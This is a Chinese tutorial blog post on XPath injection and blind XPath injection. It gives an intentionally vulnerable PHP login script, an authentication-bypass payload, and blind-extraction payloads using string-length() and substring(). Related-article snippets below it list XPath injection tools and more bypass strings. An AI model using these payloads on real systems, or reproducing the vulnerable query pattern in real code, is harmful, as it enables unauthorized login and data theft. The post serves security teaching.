php xpath注入工具,[原创]WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入

最新推荐文章于 2024-01-29 11:16:20 发布
最新推荐文章于 2024-01-29 11:16:20 发布
阅读量160 收藏 1
点赞数
文章标签: php xpath注入工具

WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入

1、什么是xpath注入

XPath是一种查询语言,它描述了如何在XML文档中查找特定元素(包括属性、处理指令等)。既然是一种查询语言,XPath在一些方面与SQL相似,不过,XPath的不同之处在于它可以用来引用XML文档的几乎任何部分,而不受访问控制限制。在SQL中,一个“用户”(在XPath/XML上下文中未定义的术语)的权限被限制在一个特定的数据库,表,列或者行。使用XPath注入攻击,攻击者可以修改

XPath查询语句来执行所选择的操作

XPath盲注攻击可以从一个使用不安全方式嵌入用户信息的应用中提取数据。在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种类型的攻击适用于以下情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,就像SQL盲注一样。

2、案例

xpath_user.xml 文件

漏洞测试文件

用户名:

密码:

if(file_exists('xpath_user.xml')){

$xml=simplexml_load_file('xpath_user.xml');

if($_POST['submit']){

$username=$_POST['username'];

$password=$_POST['password'];

$sql="//user[@username='{$username}' and @password='{$password}']";

$resulit = $xml->xpath($sql);

if(count($resulit)==0){

echo '登录失败';

}else{

echo "登录成功";

}

}

}

?>

$sql="//user[@username='{$username}' and @password='{$password}']";

select * from users where username=’username’ and password=’password’

4、注入方法

万能密码登录

admin’

or ‘1’=’1

username=admin’ or ‘1’=’1 &password=xxxxxxxxxxx&submit=submit

lazy.png

5、盲注入

string-length()获取字符长度

substring

截取字符

username=admin’and

string-length(@password)=5 or ‘1’=’1&password=0&submit=submit

返回正确是就等于登录成功

username=admin’and substring(@password,1,1)=’a’ or ‘1’=’1&password=0&submit=submit

lazy.png

先获取第一个字符 再获取第二个。admin

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/374

CyberChampion
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xxxpwn:高级 XPath 注入工具
06-09
xxxpwn : XPath 过滤扩展工具 : 专为盲优化 XPath 1 注入攻击而设计 xxxpwn 使用各种 XPath 优化来查询来自存在 XPath 注入的位置提供的后端 XML 文档的自定义信息。 默认情况下,它会尝试检索整个远程数据库,尽管这可以使用多种选项进行自定义。 许多先前发现的漏洞已作为注入文件和目标脚本提供,以便于门。 这包括为作为 xcat.py 一部分提供的易受攻击的应用程序提供的示例有效负载: :
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
应用安全系列之四:XPATH注入
jimmyleeee的专栏
02-26 1452
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输验证来解决。 XPath即XML路径语言(XML Path Language),是一种用来确定XML文档中某部分位置的语言。XPath基于XML的树状结构,提供在数据结构树中寻找节点的能力。XPath提出的初衷是将其作为一个通用的、介于XPointer与XSL之间的语法模型。 XPath使用路径表达式在 XML 文档中进行导航。 XPa
XPath 注入(仅供学习
m0_62207482的博客
01-10 426
其中uid 和 pwd 变量未经任何检查和过滤,直接传递到查询语句中,上图中实际执行的 XPath 语 句 为 : //users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin'] ,含义变成:选取 loginID=999 且 password=999 的用户 或者 选取 XML 所有节点 或者 选择 role 属性(如果有)为 admin 的用户。
Xpath注入
2202_75361164的博客
12-04 264
Xpath注入,常规使用加例题
php xpath注入工具,XPath注入攻击学习
weixin_39622289的博客
04-07 270
XPath简介XPath 是一门在 XML 文档中查找信息的语言,用于在 XML 文档中通过元素和属性进行导航XPath语法XPath中的符号XPath的数学运算符+ 加号表示加- 表示数字相减* 表示乘以div 表示除以,这里数学上的除号/已经被用作节点之间分隔符了mod 表示取余XPath逻辑运算符= 等于!= 不等于> 大于>= ...
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
Xpath:一个基于python的跨平台工具,可自动检测和利用基于错误的注入安全漏洞的过程
05-06
Xpath 一个基于python的跨平台工具,可自动检测和利用基于错误的注入安全漏洞的过程。要求的Python 3 Python pip3 Python模块requests Python模块colorama Python模块chardet模块安装pip install -r requirements....
X-path注入.pdf
04-24
Xpath注入攻击介绍,本pdf为全英文
php xpath注入工具,科普:XPATH注入
weixin_39926943的博客
04-07 373
用这个网站做示例Defaulthttp://91ri.org/ newsdetail.php?id=511http://91ri.org/ newsdetail.php?id=511.查看数据库版本?(ExtractValue)代码:Default+and+extractvalue(rand(),concat(0x7e,version()))--1+and+extractvalue(rand(),...
Xpath测试工具
03-15
Xpath测试工具,下载解压直接使用,复制内容到工具内,编写规则测试即可
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
xpath工具zip版本
08-20
XPath即为XML路径语言(XML Path Language),它是一种用来确定XML文档中某部分位置的语言。 XPath基于XML的树状结构,提供在数据结构树中找寻节点的能力。起初XPath的提出的初衷是将其作为一个通用的、介于XPointer与XSL间的语法模型。但是XPath很快的被开发者采用来当作小型查询语言。
php xpath注入工具,bee-box xPath注入学习之靶场练习
weixin_39634480的博客
04-07 351
在bwapp中,对应的xPath注入bug是XML/XPathInjection (Search),这个漏洞的引用文件是xmli_2.php,直接先看下这份文件的源码:首先从get请求中接收到表单的值,然后$genre送到xmli中,进行一次字符过滤,由于这里使用的安全等级为最低级,所以没有进行任何过滤就返回了data。接收到返回的data值之后,php文件加载xml文件,使用simplexml...
XPath注入笔记
08-20 548
XPath注入 XQuery注入   测试语句:'or '1'='1 利用工具: Xcat介绍 Xcat是python的命令行程序利用Xpath注入漏洞Web应用中检索XML文档 下载地址:https://github.com/orf/xcat 使用说明:http://xcat.readthedocs.io/en/latest/#about-xcat python3...
浅谈Xpath注入漏洞
记录学习,一起进步
03-09 1298
Xpath注入漏洞
XPath注入漏洞实战
weixin_47493074的博客
10-05 333
XPath注入漏洞实战
WEBXPath注入漏洞
HAPPY
08-17 2133
网站网址为   /demo.php?name=xml ,可能存在XPath漏洞  在网址最后面加上   ' or 1=1 or ''='      或者      ']|//*|//*[' 类似sql注入,绕过查询 条件
XPATH 注入漏洞原理以及修复方法
最新发布
it知识分享 free for nothing..
01-29 958
XPATH 注入漏洞原理以及修复方法
SQL 注入XPath 注入、代码注入 示例
06-09
SQL 注入示例: 假设我们有一个用户登录的功能,对应的查询语句为: ``` string sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; ``` 攻击者可以通过输特殊...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值